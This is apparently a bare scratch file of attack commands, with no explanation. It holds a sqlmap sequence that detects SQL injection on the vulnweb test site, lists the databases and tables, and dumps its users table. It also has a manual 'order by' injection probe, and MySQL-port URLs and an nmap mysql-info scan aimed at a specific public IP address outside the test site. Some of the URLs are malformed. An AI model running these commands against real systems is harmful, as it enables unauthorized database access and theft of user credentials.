sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump


============
php?id=1 order by 1--

http://81.223.238.248:3306/

ls /usr/share/nmap/scripts/ | grep sql

http://81.223.238.248:3306/mysql_native_password/php?id=1


nmap -P 3306 81.223.238.248 --script mysql-info.nse
